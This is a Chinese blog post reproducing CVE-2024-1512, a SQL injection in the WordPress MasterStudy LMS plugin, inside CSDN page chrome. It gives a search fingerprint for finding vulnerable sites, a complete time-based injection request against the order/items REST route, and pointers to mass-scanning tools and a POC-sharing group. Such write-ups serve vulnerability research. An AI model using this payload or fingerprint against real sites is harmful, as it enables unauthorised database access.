【漏洞复现】WordPress MasterStudy LMS插件 SQL注入漏洞(CVE-2024-1512)

最新推荐文章于 2024-07-03 18:17:14 发布
最新推荐文章于 2024-07-03 18:17:14 发布
阅读量421 收藏 1
点赞数 8
分类专栏: 漏洞复现篇 文章标签: sql WordPress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139901296
版权

0x01 产品简介

WordPress 和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和
MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

0x03 搜索语法

body="wp-content/plugins/masterstudy-lms-learning-management-system/"

在这里插入图片描述

0x04 漏洞复现

GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

5秒延时乘2
在这里插入图片描述

sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)
0xSec
05-05 639
WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。
漏洞复现WordPress MasterStudy LMS插件-SQL注入-rest_route(CVE-2024-1512)
知黑而守白
06-20 13
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Plugin MasterStudy LMS WordPress Plugin 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过/lms/stm-lms/order/items REST路由的 user参数进行基于联合的SQL注入
WordPress LayerSlider插件SQL注入漏洞复现(CVE-2024-2879)
qq_39894062的博客
04-12 709
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
五月份0day/1day/nday漏洞汇总
qq_39894062的博客
06-01 828
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
DCT_LMS_perfect.rar_DCT-LMS_DCT_LMS
07-13
利用DCT_LMS方法分别对锯齿波、方波、正弦波进行了滤波,滤波效果较好的恢复出了真实信号,相比单纯LMS滤波方法有了极大的提高。
LearnPress-bbPress:LearnPress WordPress LMS 插件的 bbPress 集成插件
05-30
LearnPress WordPress LMS 插件的高级插件(附加组件) - 添加拖放证书生成器以及为每个 LMS 课程选择设计的证书,您的学生在完成课程后将获得特定的证书。 - 每门 LMS 课程都有多名讲师支持。 集合- 通过选择...
Sensei:Sensei LMS WordPress插件
02-05
WordPress的学习管理插件,可提供最流畅的平台来帮助您教授任何内容。 Sensei LMS是可从获得的商业插件。 该插件托管在公共的Github存储库中,以便更好地促进开发人员和用户的社区贡献。 如果您有建议,错误报告或...
lms.rar_LMS MATLAB_LMS-Algorithm_lms_lms algorithm
09-14
**LMS(Least Mean Squares)算法是一种在信号处理和通信领域广泛应用的在线自适应滤波器算法。MATLAB作为一种强大的数值计算环境,是实现LMS算法的理想平台。本资源包含了一个名为“lms.m”的MATLAB源代码文件,...
LMS-Laravel:Laravel学习管理系统(LMS
02-02
LMS-Laravel 关于 LMS-Laravel是一个学习管理系统(LMS),它允许您管理课程和学习模块,从而有助于创建教育内容。 该平台简单直观,并提供以下功能: 老师(课程创建者) 学生(或用户) 管理员 顾名思义,LMS-...
LeetCode //SQL - 196. Delete Duplicate Emails
Made in Code
07-03 914
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
postgresql日志的配置
weixin_44847119的博客
07-03 1064
postgresql日志的配置。
My sql 安装,环境搭建
2201_75643669的博客
07-03 531
以下以MySQL 8.0.36为例。
解决数据库PGSQL,在Mybatis中创建临时表报错TODO IDENTIFIER,连接池用的Druid。更换最新版本Druid仍然报错解决
番茄Salad
07-02 196
然后我找到了Druid的配置,把全部配置都注释掉,居然可以成功的执行了。然后我一个一个配置排查发现,有个filters的配置,引起的报错,只要把这个注释了,就能成功执行,不管切换什么版本的Druid。我在navicat中尝试了一下执行相同的sql创建临时表语句,确实是能执行的。然后我又进行了一次测试,在xml中的sql创建临时表语句把TEMPORARY删除,直接创建一张物理表,确实成功的执行了。在网上搜索了一下,说把Druid版本升级到最新,我试着升级到了最新,确实不报这个错误了,又报了一个新的错误。
创建数据库表的语法定义包含了SQL Server、Mysql、PostgreSQLSQLite的示例
weixin_49816293的博客
07-03 733
在数据库设计中,创建表是基础且关键的一步。本文将详细介绍如何在不同数据库系统中使用数据定义语言(DDL)来定义表结构。
SQL-DQL
最新发布
qq_59076775的博客
07-03 425
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
# Sharding-JDBC从入门到精通(6)-- Sharding-JDBC 水平分库 和 垂直分库。
段子手168的博客
07-02 1441
# Sharding-JDBC从入门到精通(6)- Sharding-JDBC 水平分库 和 垂直分库。 01-Sharding-JDBC水平分库-分片策略配置 02-Sharding-JDBC水平分库-插入订单 03-Sharding-JDBC水平分库-查询订单 04-Sharding-JDBC垂直分库-分片策略配置 05-Sharding-JDBC垂直分库-插入和查询测试
Victor CMS v1.0 SQL 注入漏洞CVE-2022-28060)
Flag少侠的博客
07-01 5730
CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于文件中的user_name参数。攻击者可以通过发送特制的 SQL 语句,利用这个漏洞执行未授权的数据库操作,从而访问或修改数据库中的敏感信息。春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:实战演练:提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
sql获取下个月开始日期与结束日期
懒人w的博客
07-02 241
mysql获取下个月开始日期与结束日期
物流管理系统的SQL数据库设计含代码.doc
11-29
本文档主要探讨了物流管理信息系统(LMS)的SQL数据库设计,该系统旨在支持制造业和零售业的信息管理,通过提高物流效率和管理水平来降低成本。以下是文档中的关键知识点: 1. **需求分析**: - **目标**:服务于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值